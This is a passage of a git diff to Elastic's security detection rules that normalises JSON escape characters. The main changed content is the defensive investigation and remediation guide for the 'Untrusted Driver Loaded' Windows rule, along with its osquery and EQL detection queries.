If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts 
from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n",
 "references": [
 "https://github.com/hfiref0x/TDL",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json
index 470326da766..c10c7f385c2 100644
--- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. 
The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts 
from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n",
 "references": [
 "https://github.com/hfiref0x/TDL",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json
index 9fb29125d99..d2cd98dab02 100644
--- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. 
The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts 
from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", "references": [ "https://github.com/hfiref0x/TDL", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json index f77a9d2c665..002f92109c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json index ea06a80cdc0..68feef3aec9 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json 
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json
index 77dcb0c62c0..ec7fc87e213 100644
--- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json
index 4a3f65af53a..a7377d07a3f 100644
--- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json
index eb6ef776f3f..f7f39191dbe 100644
--- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json
index 44ac208a90b..d3faef16ade 100644
--- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json
index 79bf1144174..d566504d116 100644
--- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json
index c5848e0b096..594927b14af 100644
--- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
